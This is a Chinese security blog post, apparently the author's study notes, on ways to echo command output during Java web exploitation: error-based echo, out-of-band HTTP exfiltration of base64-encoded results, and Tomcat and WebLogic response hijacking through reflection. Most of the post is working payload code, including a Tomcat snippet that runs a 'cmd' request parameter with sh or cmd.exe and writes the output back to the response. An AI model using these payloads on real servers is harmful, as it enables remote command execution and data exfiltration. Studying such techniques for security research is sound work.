<!DOCTYPE html><html lang="en" theme-mode="auto"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>初识回显 | RacerZ</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"code.copy","copyFinish":"code.copyFinish","expand":"code.expand"}}</script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><script src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.6.1/MathJax.js"></script><script>MathJax.Hub.Config({
 menuSettings: {
   zoom: "None"
 },
 showMathMenu: false,
 jax: ["input/TeX","output/CommonHTML"],
 extensions: ["tex2jax.js"],
 TeX: {
   extensions: ["AMSmath.js","AMSsymbols.js"],
   equationNumbers: {
     autoNumber: "AMS"
   }
 },
 tex2jax: {
   inlineMath: [["\\(", "\\)"]],
   displayMath: [["\\[", "\\]"]]
 }
});</script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light' || window.matchMedia('(prefers-color-scheme:light)').matches) document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark' || window.matchMedia('(prefers-color-scheme:dark)').matches) document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.1.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><div id="shadow-header"></div><article><div id="post-bg"><div id="post-title"><h1>初识回显</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2023-01-21T16:00:00.000Z" id="date"> 2023-01-22</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2023-01-22T08:07:31.849Z" id="updated"> 2023-01-22</time></div></span></div></div><hr><div id="post-content"><h4 id="回显技术学习"><a href="#回显技术学习" class="headerlink" title="回显技术学习"></a>回显技术学习</h4><h4 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h4><p>通常我们在进行命令执行，文件读取等情况，需要查看命令执行的结果的时候，可能会出现无法查看返回结果的情况，这里学习一下几种通用的回显技术，并集成到工具当中。</p>
<h4 id="通用回显技术"><a href="#通用回显技术" class="headerlink" title="通用回显技术"></a>通用回显技术</h4><ul>
<li><p><strong>报错回显</strong></p>
<p>这种回显基于报错信息来进行回显，基本原理就是在 <code>throw new Exception()</code> 抛出异常时将回显信息返回，如果服务端并没有对报错信息作处理的话就能够直接回显出来</p>
<p class='item-img' data-src='/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230121220607394.png'><img src="/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230121220607394.png" alt="image-20230121220607394"></p>
</li>
<li><p><strong>OOB 带外回显</strong></p>
</li>
</ul>
<ol>
<li><p>对于出网机器</p>
<p>使用http传输，如wget，curl，certutil将回显信息爬出</p>
</li>
<li><p>对于不出网机器</p>
<p>使用DNS传输，ICMP传输，powershell中的wget，curl等传输</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">String</span> <span class="hljs-variable">target</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;xxxxx&quot;</span>;<br>        <span class="hljs-type">BASE64Encoder</span> <span class="hljs-variable">encoder</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">BASE64Encoder</span>();<br>        <span class="hljs-type">String</span> <span class="hljs-variable">encodeResult</span> <span class="hljs-operator">=</span> encoder.encode(<span class="hljs-built_in">this</span>.result.getBytes());<br>        <span class="hljs-type">URL</span> <span class="hljs-variable">url</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">URL</span>(target);<br>        <span class="hljs-type">String</span> <span class="hljs-variable">body</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;&#123;\&quot;result\&quot;:\&quot;&quot;</span> + encodeResult + <span class="hljs-string">&quot;\&quot;&#125;&quot;</span>;<br>        <span class="hljs-type">HttpURLConnection</span> <span class="hljs-variable">connection</span> <span class="hljs-operator">=</span> (HttpURLConnection) url.openConnection();<br>        connection.setRequestProperty(<span class="hljs-string">&quot;Content-Type&quot;</span>, <span class="hljs-string">&quot;application/json&quot;</span>);<br>        connection.setDoOutput(<span class="hljs-literal">true</span>);<br>        connection.setRequestProperty(<span class="hljs-string">&quot;Content-Length&quot;</span>, String.valueOf(body.length()));<br>        connection.setConnectTimeout(<span class="hljs-number">2000</span>);<br>        connection.setReadTimeout(<span class="hljs-number">5000</span>);<br>        connection.getOutputStream().write(body.getBytes());<br>        <span class="hljs-type">BufferedReader</span> <span class="hljs-variable">in</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">BufferedReader</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">InputStreamReader</span>(connection.getInputStream(), StandardCharsets.UTF_8));<br>        in.close();<br>        connection.disconnect();<br></code></pre></td></tr></table></figure>
<p class='item-img' data-src='/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230121230934328.png'><img src="/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230121230934328.png" alt="image-20230121230934328"></p>
<p class='item-img' data-src='/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230121231348260.png'><img src="/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230121231348260.png" alt="image-20230121231348260"></p>
</li>
</ol>
<ul>
<li><p>Tomcat型回显</p>
<p>我们的需求就是能够找到一个通用的 Response类实例，然后直接写入回显内容</p>
<p>进而需要找到如下条件的变量实例：</p>
<blockquote>
<p>是一个<strong>ThreadLocal</strong>，这样才能获取到<strong>当前线程的请求信息</strong>。而且最好是一个<strong>static静态变量</strong>，否则我们还需要去获取那个变量所在的实例</p>
</blockquote>
<p>在 <code>org.apache.catalina.core.ApplicationFilterChain#internalDoFilter()</code>和静态代码块中可以看到初始化了一个当前线程并设置了request 和 response</p>
<p class='item-img' data-src='/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230122114945914.png'><img src="/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230122114945914.png" alt="image-20230122114945914"></p>
<p>我们需要做的就是将<code>WRAP_SAME_OBJECT</code>变量设置为true，然后从 lastServicedResponse 中取 response 变量即可。注意到 WRAP_SAME_OBJECT 变量为final字段，所以我们想要通过反射修改的话需要一些特殊操作</p>
<p class='item-img' data-src='/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230122115825117.png'><img src="/2023/01/22/%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/image-20230122115825117.png" alt="image-20230122115825117"></p>
<blockquote>
<p>将 private 修饰的字段变为 accessible；再将 final 修饰符去掉；</p>
</blockquote>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">changeStaticFinal</span><span class="hljs-params">(Field field, Object newValue)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>       field.setAccessible(<span class="hljs-literal">true</span>); <span class="hljs-comment">// 如果field为private,则需要使用该方法使其可被访问</span><br>  <br>       <span class="hljs-type">Field</span> <span class="hljs-variable">modifersField</span> <span class="hljs-operator">=</span> Field.class.getDeclaredField(<span class="hljs-string">&quot;modifiers&quot;</span>);<br>       modifersField.setAccessible(<span class="hljs-literal">true</span>);<br>       <span class="hljs-comment">// 把指定的field中的final修饰符去掉</span><br>       modifersField.setInt(field, field.getModifiers() &amp; ~Modifier.FINAL);<br>  <br>       field.set(<span class="hljs-literal">null</span>, newValue); <span class="hljs-comment">// 为指定field设置新值</span><br>   &#125;<br></code></pre></td></tr></table></figure>
</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Field</span> <span class="hljs-variable">WRAP_SAME_OBJECT_FIELD</span> <span class="hljs-operator">=</span> Class.forName(<span class="hljs-string">&quot;org.apache.catalina.core.ApplicationDispatcher&quot;</span>).getDeclaredField(<span class="hljs-string">&quot;WRAP_SAME_OBJECT&quot;</span>);<br><span class="hljs-type">Field</span> <span class="hljs-variable">lastServicedRequestField</span> <span class="hljs-operator">=</span> ApplicationFilterChain.class.getDeclaredField(<span class="hljs-string">&quot;lastServicedRequest&quot;</span>);<br><span class="hljs-type">Field</span> <span class="hljs-variable">lastServicedResponseField</span> <span class="hljs-operator">=</span> ApplicationFilterChain.class.getDeclaredField(<span class="hljs-string">&quot;lastServicedResponse&quot;</span>);<br><span class="hljs-type">Field</span> <span class="hljs-variable">modifiersField</span> <span class="hljs-operator">=</span> Field.class.getDeclaredField(<span class="hljs-string">&quot;modifiers&quot;</span>);<br>modifiersField.setAccessible(<span class="hljs-literal">true</span>);<br><span class="hljs-comment">//去掉final修饰符</span><br>modifiersField.setInt(WRAP_SAME_OBJECT_FIELD, WRAP_SAME_OBJECT_FIELD.getModifiers() &amp; ~Modifier.FINAL);<br>modifiersField.setInt(lastServicedRequestField, lastServicedRequestField.getModifiers() &amp; ~Modifier.FINAL);<br>modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() &amp; ~Modifier.FINAL);<br><span class="hljs-comment">//设置允许访问</span><br>WRAP_SAME_OBJECT_FIELD.setAccessible(<span class="hljs-literal">true</span>);<br>lastServicedRequestField.setAccessible(<span class="hljs-literal">true</span>);<br>lastServicedResponseField.setAccessible(<span class="hljs-literal">true</span>);<br><br>ThreadLocal&lt;ServletResponse&gt; lastServicedResponse =<br>    (ThreadLocal&lt;ServletResponse&gt;) lastServicedResponseField.get(<span class="hljs-literal">null</span>);<br>ThreadLocal&lt;ServletRequest&gt; lastServicedRequest = (ThreadLocal&lt;ServletRequest&gt;) lastServicedRequestField.get(<span class="hljs-literal">null</span>);<br><span class="hljs-type">boolean</span> <span class="hljs-variable">WRAP_SAME_OBJECT</span> <span class="hljs-operator">=</span> WRAP_SAME_OBJECT_FIELD.getBoolean(<span class="hljs-literal">null</span>);<br><span class="hljs-type">String</span> <span class="hljs-variable">cmd</span> <span class="hljs-operator">=</span> lastServicedRequest != <span class="hljs-literal">null</span><br>    ? lastServicedRequest.get().getParameter(<span class="hljs-string">&quot;cmd&quot;</span>)<br>    : <span class="hljs-literal">null</span>;<br><span class="hljs-keyword">if</span> (!WRAP_SAME_OBJECT || lastServicedResponse == <span class="hljs-literal">null</span> || lastServicedRequest == <span class="hljs-literal">null</span>) &#123;<br>    <span class="hljs-comment">//如果是第一次请求，则修改各字段，否则获取cmd参数执行命令并返回结果</span><br>    lastServicedRequestField.set(<span class="hljs-literal">null</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">ThreadLocal</span>&lt;&gt;());<br>    lastServicedResponseField.set(<span class="hljs-literal">null</span>, <span class="hljs-keyword">new</span> <span class="hljs-title class_">ThreadLocal</span>&lt;&gt;());<br>    WRAP_SAME_OBJECT_FIELD.setBoolean(<span class="hljs-literal">null</span>, <span class="hljs-literal">true</span>);<br>&#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (cmd != <span class="hljs-literal">null</span>) &#123;<br>    <span class="hljs-type">ServletResponse</span> <span class="hljs-variable">responseFacade</span> <span class="hljs-operator">=</span> lastServicedResponse.get();<br>    responseFacade.getWriter();<br>    java.io.<span class="hljs-type">Writer</span> <span class="hljs-variable">w</span> <span class="hljs-operator">=</span> responseFacade.getWriter();<br>    <span class="hljs-type">Field</span> <span class="hljs-variable">responseField</span> <span class="hljs-operator">=</span> ResponseFacade.class.getDeclaredField(<span class="hljs-string">&quot;response&quot;</span>);<br>    responseField.setAccessible(<span class="hljs-literal">true</span>);<br>    <span class="hljs-comment">//目前得到的response是org.apache.catalina.connector.ResponseFacade，其封装了org.apache.catalina.connector.Response，要修改的usingWriter字段在后者中</span><br>    <span class="hljs-type">Response</span> <span class="hljs-variable">response</span> <span class="hljs-operator">=</span> (Response) responseField.get(responseFacade);<br>    <span class="hljs-type">Field</span> <span class="hljs-variable">usingWriter</span> <span class="hljs-operator">=</span> Response.class.getDeclaredField(<span class="hljs-string">&quot;usingWriter&quot;</span>);<br>    usingWriter.setAccessible(<span class="hljs-literal">true</span>);<br>    usingWriter.set((Object) response, Boolean.FALSE);<br><br>    <span class="hljs-type">boolean</span> <span class="hljs-variable">isLinux</span> <span class="hljs-operator">=</span> <span class="hljs-literal">true</span>;<br>    <span class="hljs-type">String</span> <span class="hljs-variable">osTyp</span> <span class="hljs-operator">=</span> System.getProperty(<span class="hljs-string">&quot;os.name&quot;</span>);<br>    <span class="hljs-keyword">if</span> (osTyp != <span class="hljs-literal">null</span> &amp;&amp; osTyp.toLowerCase().contains(<span class="hljs-string">&quot;win&quot;</span>)) &#123;<br>        isLinux = <span class="hljs-literal">false</span>;<br>    &#125;<br>    String[] cmds = isLinux ? <span class="hljs-keyword">new</span> <span class="hljs-title class_">String</span>[]&#123;<span class="hljs-string">&quot;sh&quot;</span>, <span class="hljs-string">&quot;-c&quot;</span>, cmd&#125; : <span class="hljs-keyword">new</span> <span class="hljs-title class_">String</span>[]&#123;<span class="hljs-string">&quot;cmd.exe&quot;</span>, <span class="hljs-string">&quot;/c&quot;</span>, cmd&#125;;<br>    <span class="hljs-type">InputStream</span> <span class="hljs-variable">in</span> <span class="hljs-operator">=</span> Runtime.getRuntime().exec(cmds).getInputStream();<br>    <span class="hljs-type">Scanner</span> <span class="hljs-variable">s</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Scanner</span>(in).useDelimiter(<span class="hljs-string">&quot;\\a&quot;</span>);<br>    <span class="hljs-type">String</span> <span class="hljs-variable">output</span> <span class="hljs-operator">=</span> s.hasNext() ? s.next() : <span class="hljs-string">&quot;&quot;</span>;<br>    w.write(output);<br>    w.flush();<br>&#125;<br></code></pre></td></tr></table></figure>
<p>这里有个细节就是字段 usingWriter 的作用，实际上是为了解决网页不会输出原来正常内容的问题，writer的占用将会导致原先的response得不到输出，从而在原有业务逻辑中抛出异常</p>
<p>验证的时候需要刷新两次的原因是因为第一次只是通过反射去修改值，这样在之后的运行中就会cache我们的请求，从而也就能获取到response。</p>
<ul>
<li><p>weblogic 型回显</p>
<p>原理和上面一样，也是筛选出可以调用req 和 rep内容的线程，对其回显内容进行改造，weblogic 中的 ServletRequestImpl 类符合条件</p>
<blockquote>
<p><code>((ServletRequestImpl) this.getCurrentWork()).getResponse().getWriter().write(&quot;xxxxxxx&quot;)</code>，就会在返回包中看到返回xxxxxxx</p>
</blockquote>
<p>按照字节流进行输出，如下调用方式：(weblogic10.3.6)</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java">((ServletRequestImpl) <span class="hljs-built_in">this</span>.getCurrentWork()).getResponse().getServletOutputStream().writeStream(<span class="hljs-keyword">new</span> <span class="hljs-title class_">StringInputStream</span>(<span class="hljs-string">&quot;xxxx&quot;</span>))<br>((ServletRequestImpl) <span class="hljs-built_in">this</span>.getCurrentWork()).getResponse().getServletOutputStream().flush()<br></code></pre></td></tr></table></figure>
<p>同时，为了避免其他输出信息的干扰，如下方式可以将结果覆盖为空</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java">((ServletRequestImpl) <span class="hljs-built_in">this</span>.getCurrentWork()).getResponse().getWriter().write(<span class="hljs-string">&quot;&quot;</span>)<br></code></pre></td></tr></table></figure>
<p>结合一下，利用反射构造的结果如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs java">Class&lt;?&gt; clazz = Class.forName(<span class="hljs-string">&quot;weblogic.work.ExecuteThread&quot;</span>);<br>        <span class="hljs-type">Method</span> <span class="hljs-variable">m</span> <span class="hljs-operator">=</span> clazz.getDeclaredMethod(<span class="hljs-string">&quot;getCurrentWork&quot;</span>);<br>        <span class="hljs-type">Object</span> <span class="hljs-variable">currentWork</span> <span class="hljs-operator">=</span> m.invoke(Thread.currentThread());<br><br>        Class&lt;?&gt; servletRequestImpl = Class.forName(<span class="hljs-string">&quot;weblogic.servlet.internal.ServletRequestImpl&quot;</span>);<br>        <span class="hljs-type">Method</span> <span class="hljs-variable">m2</span> <span class="hljs-operator">=</span> servletRequestImpl.getDeclaredMethod(<span class="hljs-string">&quot;getResponse&quot;</span>);<br>        <span class="hljs-type">Object</span> <span class="hljs-variable">response</span> <span class="hljs-operator">=</span> m2.invoke(currentWork);<br><br>        Class&lt;?&gt; servletResponseImpl = Class.forName(<span class="hljs-string">&quot;weblogic.servlet.internal.ServletResponseImpl&quot;</span>);<br>        <span class="hljs-type">Method</span> <span class="hljs-variable">m3</span> <span class="hljs-operator">=</span> servletResponseImpl.getDeclaredMethod(<span class="hljs-string">&quot;getServletOutputStream&quot;</span>);<br>        <span class="hljs-type">Object</span> <span class="hljs-variable">outputStream</span> <span class="hljs-operator">=</span> m3.invoke(response);<br><br>        Class&lt;?&gt; stringInputStream = Class.forName(<span class="hljs-string">&quot;weblogic.xml.util.StringInputStream&quot;</span>);<br>        Constructor&lt;?&gt; constructor = stringInputStream.getDeclaredConstructor(String.class);<br>        <span class="hljs-type">Object</span> <span class="hljs-variable">resultStream</span> <span class="hljs-operator">=</span> constructor.newInstance(<span class="hljs-built_in">this</span>.result);<br><br>        Class&lt;?&gt; servletOutputStreamImpl = Class.forName(<span class="hljs-string">&quot;weblogic.servlet.internal.ServletOutputStreamImpl&quot;</span>);<br>        <span class="hljs-type">Method</span> <span class="hljs-variable">m4</span> <span class="hljs-operator">=</span> servletOutputStreamImpl.getDeclaredMethod(<span class="hljs-string">&quot;writeStream&quot;</span>, stringInputStream);<br>        m4.invoke(outputStream, resultStream);<br><br>        <span class="hljs-type">Method</span> <span class="hljs-variable">m5</span> <span class="hljs-operator">=</span> servletOutputStreamImpl.getDeclaredMethod(<span class="hljs-string">&quot;flush&quot;</span>);<br>        m5.invoke(outputStream);<br><br>        <span class="hljs-type">Method</span> <span class="hljs-variable">m6</span> <span class="hljs-operator">=</span> servletResponseImpl.getDeclaredMethod(<span class="hljs-string">&quot;getWriter&quot;</span>);<br>        <span class="hljs-type">Object</span> <span class="hljs-variable">writer</span> <span class="hljs-operator">=</span> m6.invoke(response);<br><br>        Class&lt;?&gt; printWriter = Class.forName(<span class="hljs-string">&quot;java.io.PrintWriter&quot;</span>);<br>        <span class="hljs-type">Method</span> <span class="hljs-variable">m7</span> <span class="hljs-operator">=</span> printWriter.getDeclaredMethod(<span class="hljs-string">&quot;write&quot;</span>, String.class);<br>        m7.invoke(writer, <span class="hljs-string">&quot;&quot;</span>);<br></code></pre></td></tr></table></figure>
<p>TODO：待深入</p>
</li>
</ul>
<h4 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h4><p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1956480">https://cloud.tencent.com/developer/article/1956480</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7348">https://xz.aliyun.com/t/7348</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/2d490b0155ad">https://www.jianshu.com/p/2d490b0155ad</a></p>
<p><a target="_blank" rel="noopener" href="https://l3yx.github.io/2020/03/31/Java-Web%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%9B%9E%E6%98%BE%E6%80%BB%E7%BB%93/#%E5%9F%BA%E4%BA%8E%E5%85%A8%E5%B1%80%E5%82%A8%E5%AD%98%E8%8E%B7%E5%8F%96Tomcat-Response">https://l3yx.github.io/2020/03/31/Java-Web%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%9B%9E%E6%98%BE%E6%80%BB%E7%BB%93/#%E5%9F%BA%E4%BA%8E%E5%85%A8%E5%B1%80%E5%82%A8%E5%AD%98%E8%8E%B7%E5%8F%96Tomcat-Response</a></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/01/22/Readme/">← 下一篇 JNDI EXP 项目</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/01/18/Java%20%E5%AD%97%E8%8A%82%E7%A0%81/">ASM字节码学习 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧</a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">RacerZ</a></h1><div id="description"><p></p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/RacerZ-fighting"><i class="fab fa-github" alt="GitHub"></i></a><a class="social" href="qiyizhang2002@foxmail.com"><i class="fa fa-envelope" alt="E-Mail"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0"><span class="toc-number">1.</span> <span class="toc-text">回显技术学习</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E5%9C%A8%E5%89%8D%E9%9D%A2"><span class="toc-number">2.</span> <span class="toc-text">写在前面</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E7%94%A8%E5%9B%9E%E6%98%BE%E6%8A%80%E6%9C%AF"><span class="toc-number">3.</span> <span class="toc-text">通用回显技术</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">4.</span> <span class="toc-text">参考链接</span></a></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside><div id="shadow-aside"></div></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>